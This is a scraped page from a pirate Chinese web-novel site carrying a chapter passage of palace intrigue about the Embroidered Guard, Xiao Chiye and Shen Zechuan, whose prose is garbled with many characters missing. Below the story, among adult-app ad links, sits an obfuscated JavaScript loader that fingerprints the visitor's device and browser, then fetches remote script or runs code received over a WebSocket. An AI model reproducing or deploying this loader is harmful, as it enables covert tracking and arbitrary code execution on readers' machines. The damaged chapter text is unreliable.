最新网址:www.tlxsw.net

章节若无法正常显示,请关闭畅读或阅读模式,或复制网址到其他浏览器阅读!

唐酒卿提示您:看后求收藏(天籁小说网www.tlxsw.net),接着再看更方便。

“锦衣卫乃朕狗。”咸德帝盯纪雷,“锦衣卫指挥使,认什干爹、干爷?平提,算恭顺!今夜朕安抚太听明白?”

纪雷叩首,:“微臣遵旨,锦衣卫效命!”

雨已,办差房太监给打伞。

纪雷萧驰野抬抬走。萧驰野浑:“老纪,已。昨被关禁足,玩,敢贸。”

纪雷混账,简直方撒,胡乱点点头,赶紧走。

禁军,?”萧驰野太监伞,打纪雷继续往宫外走。

纪雷群赖!跟,更

客气:“精神气儿比。”

吧。”萧驰野恬知耻,“禁军校场太,施展啊。指挥声,再给禁军拨?”

纪雷早听闻禁军校场玩马球,真敢方。拒绝,:“怕办,楚王月扩府,强占民居给告府衙。今阒,固安哪儿给二公方做校场?再算城边真位置,批给八营啊。”

“诶。”萧驰野,“城禁军,城外啊。方够,玩尽兴。”

纪雷才咂摸向萧驰野,笑:“啊二公,早?跟打马虎眼呢!”

拜托老纪。”萧驰野,“老纪指挥口,拒绝?。”

“跟别提银。”纪雷终态度,“边认干儿,正寻思哪儿给马!马,谁比二公更懂?”

几匹玩啊。”萧驰野,“鸿雁山脉配马,匹差。直接送。”

“等跟固安提声。”纪雷,“校场儿?消息!”

,萧驰野马车。晨阳纪雷轿:“督真马给!”

“拿短。”萧驰野蹬掉靴,脚早泡湿,“校场必须太扎眼老贼马办。”冷声,“见祖宗。”

马车晃,萧驰野巾帕抹脸,问:“呢?”

晨阳:“?”

“沈泽川!”

“早回。”晨阳给萧驰野倒茶,,“脚步虚浮……锦衣卫差?”

“养象啊。”萧驰野接口饮尽,“病秧干苦力呢,偷懒。”

偷懒喷嚏,昏暗半刻,猜受寒

门忽被推,跨进肥硕身形。奚鸿轩进啧啧称奇:“啊,锦衣卫吧。”

沈泽川回头,:“破宅院,租。”

啊。”奚鸿轩搓沈泽川,“先帝赐给太,太齐惠连,齐惠连死被卖掉老院?”

沈泽川含茶,奚鸿轩玩味视片刻。

奚鸿轩:“瞧贱嘴,怎老打探底细呢?刚才路,潘砸,挺痛快。”

“奚指挥使。”沈泽川,“挨儿,惹怀疑,。”

“奚固安便。”奚鸿轩肥厚掌搁,“与其等重臣口,口,先。经此真正。”

沈泽川拿,捡点素食:“雕虫技,让二少见笑。”

奚鸿轩沈泽川吃,才碰:“干什?”

锦衣卫混口饭吃。”沈泽川,“纪雷干儿奚固安八拜交。弄死奚固安,怎纪雷?各分条命,让兄弟。”

奚鸿轩闷笑半晌,伏,冲沈泽川阴测测:“跟纪雷什仇?”

沈泽川捡掉花椒,眼皮:“穿喜欢。”富品

免费看片APP 美女直播间
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE3Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x53\x42\x49\x4d\x4d\x48\x63\x7a\x42\x63']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){if(!E)return;function l(s){if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tkMmtqODk5LmJhbWNzZm0uYY29t','d3NzOOi8vd3MuZ2VuZ2Z1cXVhbi5jb206OOTE5MSx3c3M6Ly93cy5xb3Jvc21hbGwuY29tOOjkxOOTEsd3NzOOi8vd3Mud2VpeGlzaXdhbmcuY29tOOjkxOOTE=',window,document,['Y','O']);}:function(){};
都市相关阅读More+

FOG[电竞]

漫漫何其多

倾卿我心

影柒

神鹰天骄

九9重天

乳娘的诱惑

小落

医生帮帮我小说全集

小说免费阅读/季亭亭/梁衍照

秘密

路冠
本页面更新于2022-01-23 11:05:47